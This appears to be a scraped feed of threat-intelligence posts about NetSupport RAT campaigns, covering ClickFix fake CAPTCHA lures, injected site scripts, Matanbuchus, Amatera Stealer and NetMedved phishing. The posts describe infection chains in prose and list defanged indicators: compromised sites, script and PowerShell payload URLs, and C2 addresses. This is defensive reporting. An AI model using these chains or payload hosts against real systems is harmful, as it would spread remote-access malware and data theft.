JS SMUGGLER Multi Stage Hidden iframes Obfuscated JavaScript Silent Redirectors NetSupport RAT Delivery
Pulse ID: 6939016e326fd6a1b64a4ad6
Pulse Link: https://otx.alienvault.com/pulse/6939016e326fd6a1b64a4ad6
Pulse Author: Tr1sa111
Created: 2025-12-10 05:13:18
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CyberSecurity #InfoSec #Java #JavaScript #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #RAT #bot #Tr1sa111
Campaign uses ClickFix page to push NetSupport RAT
The SmartApeSG campaign, also known as ZPHP or HANEYMANEY, has evolved from using fake browser update pages to employing ClickFix-style fake CAPTCHA pages. This campaign distributes malicious NetSupport RAT packages as its initial infection vector. The attack chain begins with an injected script on compromised websites, which, under certain conditions, displays a fake CAPTCHA page. When users interact with this page, malicious content is injected into the Windows clipboard, prompting users to paste and execute it. This leads to the download and installation of NetSupport RAT, which maintains persistence through a Start Menu shortcut. The campaign frequently changes domains, packages, and C2 servers to evade detection.
Pulse ID: 69370db0cd2bc81cbbe13d51
Pulse Link: https://otx.alienvault.com/pulse/69370db0cd2bc81cbbe13d51
Pulse Author: AlienVault
Created: 2025-12-08 17:41:04
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#Browser #CAPTCHA #Clipboard #CyberSecurity #FakeBrowser #InfoSec #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #PHP #RAT #SmartApeSg #Windows #bot #AlienVault
JS#SMUGGLER Deploying NetSupport RAT via Compromised Websites
JS#SMUGGLER is a web-based malware campaign that uses compromised
websites to deliver the NetSupport RAT
Pulse ID: 6937559768d29b8bfdeb42c9
Pulse Link: https://otx.alienvault.com/pulse/6937559768d29b8bfdeb42c9
Pulse Author: cryptocti
Created: 2025-12-08 22:47:51
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CyberSecurity #InfoSec #Malware #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #RAT #bot #cryptocti
SmartApeSG campaign uses ClickFix page to push NetSupport RAT
Pulse ID: 6936a7709dd0d1b331e8ad64
Pulse Link: https://otx.alienvault.com/pulse/6936a7709dd0d1b331e8ad64
Pulse Author: CyberHunter_NL
Created: 2025-12-08 10:24:48
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CyberSecurity #InfoSec #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #RAT #SmartApeSg #bot #CyberHunter_NL
Technical Analysis of Matanbuchus 3.0
Matanbuchus, a C++ malicious downloader offered as Malware-as-a-Service since 2020, has evolved to version 3.0. It comprises a downloader and main module, utilizing obfuscation techniques like junk code, encrypted strings, and API hashing. The malware implements anti-analysis features, including an expiration date and persistence via scheduled tasks. It communicates using encrypted Protobufs over HTTP(S), supporting various commands for payload execution, data collection, and system manipulation. Matanbuchus has been associated with ransomware operations and used to distribute other malware like Rhadamanthys and NetSupport RAT.
Pulse ID: 692ff91584de642b1a8cbd3b
Pulse Link: https://otx.alienvault.com/pulse/692ff91584de642b1a8cbd3b
Pulse Author: AlienVault
Created: 2025-12-03 08:47:17
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CyberSecurity #HTTP #InfoSec #Malware #MalwareAsAService #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #RAT #RansomWare #Rhadamanthys #bot #AlienVault
EVALUSION Campaign Delivers Amatera Stealer and NetSupport…
Pulse ID: 6929307677258c017cf87bf6
Pulse Link: https://otx.alienvault.com/pulse/6929307677258c017cf87bf6
Pulse Author: Tr1sa111
Created: 2025-11-28 05:17:42
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CyberSecurity #InfoSec #NetSupport #OTX #OpenThreatExchange #bot #Tr1sa111
The 'Bear' attacks: what we learned about the phishing campaign targeting Russian organizations
A hacking group named NetMedved has been conducting phishing attacks against Russian organizations since October 2025. The campaign uses malicious LNK files disguised as business documents to deliver NetSupport RAT malware. The attackers employ various techniques including PowerShell scripts, finger protocol, and anti-analysis checks. They utilize multiple domains for payload delivery and command and control. The group's infrastructure overlaps with previous campaigns from 2024, suggesting an evolution of tactics rather than a new actor. NetMedved's operations involve social engineering, custom obfuscation, and abuse of legitimate tools to evade detection and maintain persistence on compromised systems.
Pulse ID: 6926cae8043aabe58197d11e
Pulse Link: https://otx.alienvault.com/pulse/6926cae8043aabe58197d11e
Pulse Author: AlienVault
Created: 2025-11-26 09:39:52
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CyberSecurity #ICS #InfoSec #LNK #Malware #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #Phishing #PowerShell #RAT #Russia #SocialEngineering #bot #AlienVault
«Медвед» атакует: что мы узнали про фишинговую кампанию группировки, нацеленной на российские организации
В октябре 2025 года мы, группа киберразведки департамента Threat Intelligence, зафиксировала продолжающуюся фишинговую активность хакерской группировки, которую мы назвали NetMedved. Обоснование выбора данного наименования будет рассмотрено в заключительной части статьи. Атаки хакеров ориентированы на российские организации; в качестве конечной полезной нагрузки используется вредоносная версия легитимного инструмента удалённого администрирования NetSupport Manager (далее — NetSupportRAT). В этой статье расскажем о специфике кампании и связи с нашими предыдущими находками.
https://habr.com/ru/companies/pt/articles/968572/
#киберразведка #расследование_инцидентов #кибератаки #хакерская_группировка #хакерские_инструменты #фишинговые_письма #вредоносное_программное_обеспечение #малварь #finger #netsupport
EVALUSION Campaign Delivers Amatera Stealer and NetSupport...
The eSentire Threat Response Unit identified a malware campaign using ClickFix as an initial access vector to deploy Amatera Stealer and NetSupport RAT. Amatera Stealer is a rebranded version of ACR Stealer, with advanced evasion techniques like WoW64 SysCalls to bypass security solutions. It targets crypto-wallets, browsers, and messaging apps. The attack chain involves social engineering, PowerShell stages, and a .NET-based downloader. Amatera communicates with its C2 server using encrypted channels and can deploy additional payloads. The campaign selectively targets systems with valuable data or domain membership before deploying NetSupport RAT. Recommendations include disabling mshta.exe, restricting the Run prompt, implementing phishing awareness training, and using Next-Gen AV or EDR solutions.
Pulse ID: 691cf085ce463d915d5c5dc8
Pulse Link: https://otx.alienvault.com/pulse/691cf085ce463d915d5c5dc8
Pulse Author: AlienVault
Created: 2025-11-18 22:17:41
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#Browser #CyberSecurity #EDR #InfoSec #LUA #Malware #NET #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #Phishing #PowerShell #RAT #SocialEngineering #ThreatResponseUnit #bot #eSentire #AlienVault
⚠️ CVE-2025-34164: HIGH-severity heap overflow in NetSupport Manager 14.x (<14.12.0000) lets remote attackers cause DoS or run code—no auth needed. Restrict access & prep to patch! https://radar.offseq.com/threat/cve-2025-34164-cwe-122-heap-based-buffer-overflow--7fdd6f7b #OffSeq #NetSupport #Vulnerability #Cybersecurity
⚠️ CVE-2025-34165: NetSupport Manager 14.x (pre-14.12.0000) HIGH severity stack-based buffer overflow allows remote, unauthenticated DoS or memory leak. Restrict access, monitor for attacks, prep for patching. https://radar.offseq.com/threat/cve-2025-34165-cwe-121-stack-based-buffer-overflow-e4ea3e1b #OffSeq #NetSupport #Vuln #BlueTeam
2025-08-22 (Friday): #SmartApeSG for #NetSupport #RAT (#NetSupportRAT)
Some sites have injected script that leads directly to the fake CAPTCHA page for #ClickFix instructions.
Other sites have injected script that redirects to the URL for the fake CAPTCHA page.
Direct example (compromised site --> script for CAPTCHA page):
- hxxps[:]//mexicobusiness[.]news/
- hxxps[:]//clouwave[.]net/ajax/pixi.min.js
Recirect example (compromised site --> Redirect URL --> script for CAPTCHA page):
- hxxps[:]//myvocabulary[.]com/
- hxxps[:]//myevmanual[.]com/d.js <-- 302 found for next URL
- hxxps[:]//clouwave[.]net/ajax/pixi.min.js
Either way, you get the same CAPTCHA page.
IOCs at https://github.com/malware-traffic/indicators/blob/main/2025-08-22-IOCs-for-SmartApeSG-activity.txt
cc: @monitorsg
2025-08-20 (Wednesday): #SmartApeSG for fake #CAPTCHA page with #ClickFix instructions that led to an MSI file for #NetSupport #RAT and the #NetSupportRAT infection led to #StealCv2.
Malware samples, a #pcap, and indicators at www.malware-traffic-analysis.net/2025/08/20/index.html
🚨 How #Rhadamanthys Stealer Slips Past Defenses using ClickFix
⚠️ Rhadamanthys is now delivered via ClickFix, combining technical methods and social engineering to bypass automated security solutions, making detection and response especially challenging.
👾 While earlier ClickFix campaigns mainly deployed #NetSupport RAT or #AsyncRAT, this C++ infostealer ranks in the upper tier for advanced evasion techniques and extensive data theft capabilities.
#ANYRUN Sandbox lets SOC teams observe and execute complex chains, revealing evasive behavior and providing intelligence that can be directly applied to detection rules, playbooks, and proactive hunting.
🔗 Execution Chain:
ClickFix ➡️ msiexec ➡️ exe-file ➡️ infected system file ➡️ PNG-stego payload
In a recent campaign, the phishing domain initiates a ClickFix flow (#MITRE T1566), prompting the user to execute a malicious MSI payload hosted on a remote server.
🥷 The installer is silently executed in memory (#MITRE T1218.007), deploying a stealer component into a disguised software directory under the user profile.
The dropped binary performs anti-VM checks (T1497.001) to avoid analysis.
In later stages, a compromised system file is used to initiate a TLS connection directly to an IP address, bypassing DNS monitoring.
📌 For encryption, attackers use self-signed TLS certificates with mismatched fields (e.g., Issuer or Subject), creating distinctive indicators for threat hunting and expanding an organization’s visibility into its threat landscape.
🖼️ The C2 delivers an obfuscated PNG containing additional payloads via steganography (T1027.003), extending dwell time and complicating detection.
🎯 See execution on a live system and download actionable report: https://app.any.run/tasks/a101654d-70f9-40a5-af56-1a8361b4ceb0/?utm_source=mastodon&utm_medium=post&utm_campaign=rhadamanthys&utm_term=120825&utm_content=linktoservice
🔍 Use these #ANYRUN TI Lookup search queries to track similar campaigns and enrich #IOCs with live attack data from threat investigations across 15K SOCs:
https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=rhadamanthys&utm_content=linktoti&utm_term=120825#%7B%2522query%2522:%2522threatName:%255C%2522clickfix%255C%2522%2522,%2522dateRange%2522:180%7D
https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=rhadamanthys&utm_content=linktoti&utm_term=120825#%7B%2522query%2522:%2522threatName:%255C%2522rhadamanthys%255C%2522%2522,%2522dateRange%2522:180%7D
https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=rhadamanthys&utm_content=linktoti&utm_term=120825#%7B%2522query%2522:%2522(threatName:%255C%2522clickfix%255C%2522%2520OR%2520threatName:%255C%2522susp-clipboard%255C%2522)%2520AND%2520threatName:%255C%2522netsupport%255C%2522%2522,%2522dateRange%2522:180%7D
https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=rhadamanthys&utm_content=linktoti&utm_term=120825#%7B%2522query%2522:%2522(threatName:%255C%2522clickfix%255C%2522%2520OR%2520threatName:%255C%2522susp-clipboard%255C%2522)%2520AND%2520threatName:%255C%2522asyncrat%255C%2522%2522,%2522dateRange%2522:180%7D
👾 IOCs:
84.200[.]80.8
179.43[.]141.35
194.87[.]29.253
flaxergaurds[.]com
temopix[.]com
zerontwoposh[.]live
loanauto[.]cloud
wetotal[.]net
Find more indicators in the comments 💬
Protect critical assets with faster, deeper visibility into complex threats using #ANYRUN 🚀
🚨 #NetSupport RAT is a legit remote access app turned cyber weapon. Its activity spiked in 2025 with data theft attacks targeting healthcare, government, and SMBs in NA and EU.
👨💻 Read report and see analysis of a fresh sample: https://any.run/malware-trends/netsupport/?utm_source=mastodon&utm_medium=post&utm_campaign=netsupport_card&utm_term=070825&utm_content=linktomtt
🚨 #NetSupport RAT is a legit remote access app turned cyber weapon.
Its activity spiked in 2025 with data theft attacks targeting healthcare, government, and SMBs in NA and EU.
👨💻 Read report and see analysis of a fresh sample: https://any.run/malware-trends/netsupport/?utm_source=mastodon&utm_medium=post&utm_campaign=netsupport&utm_content=tracker&utm_term=280725
2025-07-15 (Tuesday): Tracking #SmartApeSG
The SmartApeSG script injected into page from compromised website leads to #ClickFix style fake verification page. ClickFix-ing you way through this leads to a #NetSupportRAT infection.
Compromised site (same as yesterday):
- medthermography[.]com
URLs for ClickFix style fake verification page:
- warpdrive[.]top/jjj/include.js
- warpdrive[.]top/jjj/index.php?W11WzmLj
- warpdrive[.]top/jjj/buffer.js?409a8bdbd9
Running the script for NetSupport RAT:
- sos-atlanta[.]com/lal.ps1
- sos-atlanta[.]com/lotu.zip?l=4773
#NetSupport RAT server (same as yesterday):
- 185.163.45[.]87:443
2025-07-14 (Monday): #SmartApeSG script injected into page from compromised website leads to #ClickFix style fake verification page. ClickFix-ing you way through this leads to a #NetSupportRAT infection.
Compromised site:
- medthermography[.]com
URLs for ClickFix style fake verification page:
- lebensversicherungvergleich[.]top/jjj/include.js
- lebensversicherungvergleich[.]top/jjj/index.php?OtKXgPVX
- lebensversicherungvergleich[.]top/jjj/buffer.js?4261984971
Running the script for NetSupport RAT:
- affordableasphalt-paving[.]com/lal.ps1
- affordableasphalt-paving[.]com/lotu.zip?l=3526
#NetSupport RAT server:
- 185.163.45[.]87:443
🚨 #Obfuscated BAT file used to deliver NetSupport RAT
At the time of the analysis, the sample had not yet been submitted to #VirusTotal ⚠️
👨💻 See sandbox session: https://app.any.run/tasks/db6fcb53-6f10-464e-9883-72fd7f1db294?utm_source=mastodon&utm_medium=post&utm_campaign=obfuscated_bat_file&utm_content=linktoservice&utm_term=050625
🔗 Execution chain:
cmd.exe (BAT) ➡️ #PowerShell ➡️ PowerShell ➡️ #client32.exe (NetSupport client) ➡️ reg.exe
Key details:
🔹 Uses a 'client32' process to run #NetSupport #RAT and add it to autorun in registry via reg.exe
🔹 Creates an 'Options' folder in %APPDATA % if missing
🔹 NetSupport client downloads a task .zip file, extracts, and runs it from %APPDATA%\Application .zip
🔹 Deletes ZIP files after execution
❗️ BAT droppers remain a common choice in attacks as threat actors continue to find new methods to evade detection.
Use #ANYRUN’s Interactive Sandbox to quickly trace the full execution chain and uncover #malware behavior for fast and informed response.
Sitios falsos de #DocuSign y #Gitcode están propagando #NetSupport RAT por medio de un ataque de #PowerShell de varias etapas https://blogs.masterhacks.net/noticias/hacking-y-ciberdelitos/sitios-falsos-de-docusign-y-gitcode-estan-propagando-netsupport-rat-a-traves-de-un-ataque-de-powershell-de-varias-etapas/
